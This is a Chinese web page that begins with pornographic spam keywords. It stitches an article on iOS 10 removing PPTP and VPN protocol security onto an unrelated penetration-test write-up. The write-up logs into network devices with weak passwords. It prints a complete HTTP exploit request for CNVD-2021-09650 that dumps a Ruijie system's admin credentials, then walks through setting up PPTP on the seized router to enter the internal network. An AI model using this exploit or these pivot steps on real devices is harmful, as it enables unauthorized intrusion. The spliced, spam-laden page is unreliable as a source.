欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    雖然iOS 10和iPhone7/iPhone7plus很早就面世了,但是小編不太確定它是否好用,所以沒有做第一個吃螃蟹的人,不過最近看了許多測評以后還是耐不住誘惑,狠下心把它給update了,升級很順利,試用了一下感覺還不錯,短信的界面更好看了,接下來小編本能的開始設置了VPN(VPN可以滿足我們查看國外的一些信息),但是在選擇類型的時候把小編我的下巴都嚇掉了。

    竟然沒有PPTP類型?怎么會沒有PPTP類型啊?是取消了還是測試版漏掉了啊?小編翻墻可就靠它了啊,于是小編趕緊上網找了一下,大家各說風云,但是沒有看到官方的消息。

    通過各位瘋友的說法,可能是是蘋果官方覺得PPTP太不安全了,有安全漏洞,所以把他給取消了。那PPTP真的不安全嗎?PPTP到底是什么東西啊?

    PPTP(Point to Point Tunneling Protocol)即點對點隧道協議。PPTP是一種支持多協議虛擬專用網絡的網絡技術,它工作在第二層。通過該協議,遠程用戶能夠通過 Microsoft Windows NT工作站、Windows xp 、 Windows 2000 和windows2003、windows7操作系統以及其它裝有點對點協議的系統安全訪問公司網絡,并能撥號連入本地ISP,通過 Internet 安全鏈接到公司網絡。如下圖:

    PPTP協議是在PPP協議的基礎上開發的一種新的增強型安全協議,支持多協議虛擬專用網(VPN),可以通過密碼驗證協議(PAP)、可擴展認證協議(EAP)等方法增強安全性。可以使遠程用戶通過撥入ISP、通過直接連接Internet或其他網絡安全地訪問企業網。所以PPTP還是算挺安全的,但是任何事物都不能只看本身,只有比較才能找出自己的優點和缺點,所以接下來我們一起來比較一下PPTP、L2TP、IPSec和IKEv2的安全性:

    PPTP微軟開發的,后來標準化,但是好多細節不透明,有兩個通道,TCP控制通道(明文),用來動態建立GRE隧道,GRE隧道封裝真正的用戶流量,PPP+ PPP payload ,只是靠PPP自身的一個加密協議來完成 payload 的加密,GRE頭全是明文,安全級別不夠高。

    L2TPL2TP + IP sec 的實現方式,安全性高。UDP后的payload 全部加密。

    IP sec 使用IKEv1 或IKEv2來建立IP sec VPN,為了克服NAT的限制,使用UDP 4500 做傳輸封裝,安全性高,如果使用數字證書認證,可能會遭受中間人攻擊。如果使用預共享密碼認證,安全可靠,中間人無法攻擊。

    這邊要注意一個問題:因為IKEv2Internet Key Exchange version 2 的縮寫,是最新出來的一種協議,它是用來完成認證,協商加密、哈西算法、以及對應密鑰,定義什么流量需要加密,完成IKE SA,IP sec SA 的建立。至于安全性是由認證方式(預共享密碼,數字證書),加密算法(AES,3DES),哈西算法(SHA,MD5),Anti-replay window 來共同完成的,只要有一個環節有漏洞,就是不安全的。所以IKEv2僅僅是一種密鑰交換控制協議,不能稱其為VPN協議。

    所以通過比較以后可以發現PPTP真的是這四種協議中最安全性最低的協議了,所以看來蘋果公司也是為了用戶的安全性著想,所以把PPTP給下了,既然這么不安全大家索性就多學習一些新的東西,找找新的方法來翻墻吧!

    一、利用弱口令進網絡設備

    弱口令yyds,這是這次攻防演練第二個驚喜,在掃目標的C段IP的時候發現五個網絡設備,有三個路由器、一個web管理系統和一臺虛擬專用網絡設備,看起來版本都比較舊就想著先去找找版本漏洞,試了試都沒登陸進去,就抱著僥幸心理去試試弱口令,沒想到這網絡設備居然也有弱口令,進去了兩個弱口令和一個web管理系統。

    后續會繼續為大家分享各系列比如hvv實戰經驗、知識總結的文章,歡迎大家來關注我們的公眾號“浪颯sec”。

    不過另外一個web管理系統的弱口令不是管理員權限,逛了半天沒啥功能,這里就不截圖了。我們知道網絡設備一般都是會連接辦公網的,像路由器這種都是有搭建虛擬專用網絡的功能的,有PPTP、IPsec和L2TP三種模式,本次我是使用PPTP搭建虛擬專用網絡進內網的。

    二、利用CNVD-2021-09650獲取web管理系統管理員權限

    因為web管理系統沒有獲取管理員權限,就想著能不能提升波權限,想起前段時間銳捷路由器的一個CNVD,嘗試看看這個web管理系統存不存在這個CNVD漏洞。

    構造數據包,返回賬戶密碼

    POST /WEB_VMS/LEVEL15/ HTTP/1.1
    
    Host: xxx.xxx.xxx.xxx
    
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
    
    Accept: */*
    
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
    Accept-Encoding: gzip, deflate
    
    Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
    
    Content-Type: text/plain;charset=UTF-8
    
    Content-Length: 80
    
    Origin: http:// xxx.xxx.xxx.xxx
    
    Connection: close
    
    Referer: http:// xxx.xxx.xxx.xxx /index.htm
    
    Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; currentURL=
    
     
    
    command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

    返回賬戶名密碼,利用admin賬戶登陸成功。

    三、利用銳捷路由器搭建PPTP進內網

    來到路由器這里開啟 PPTP 服務(公網ip)并且添加一個 PPTP 賬號

    之后在自己的電腦上建立一個虛擬專用網絡 ,我的電腦是win11,win10以及以下版本可能會有些許差別。打開控制面板->網絡和共享中心,設置新的連接和網絡

    連接到工作區

    選擇連接虛擬專用網絡,輸入剛剛銳捷路由器的公網IP,下一步填入設置好的PPTP賬戶密碼

    然后去網絡適配器,發現會多出一個虛擬專用網絡,右鍵點擊屬性

    像圖中這樣設置

    然后連接虛擬專用網絡,成功進入內網

    這里需要注意一點,如果虛擬專用網絡連接上后自己的網絡斷了虛擬專用網絡屬性里的在遠程網絡上使用默認網關選項不勾選就可以了,剛開始我的網就是老斷,折騰了半天才整明白。

    進內網那剩下的就是掃IP、橫向等內網滲透的常規思路了,由于內網東西太多,圖片全是碼,這里就不再講了,后續有機會再和大家分享分享內網滲透。

    總結

    攻防演練中網絡設備的權限得分比網站權限的高,就是因為拿到網絡設備比較容易進內網。就像本次案例,利用路由器創建PPTP搭建虛擬專用網絡進內網,可以說拿下網絡設備的權限就等于進內網成功了一半。但是拿下網絡設備的權限卻沒那么容易,這次是瞎貓碰到死耗子出現了弱口令,一般情況下大家可以去根據登陸面板或者源代碼下去判斷網絡設備的版本,然后去漏洞庫查詢相應的版本漏洞進行滲透。

    后續會繼續為大家分享各系列比如hvv實戰經驗、知識總結的文章,歡迎大家來關注我們的公眾號“浪颯sec”和“AK4安全團隊”,這里有我們自己搭建的漏洞庫哦。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有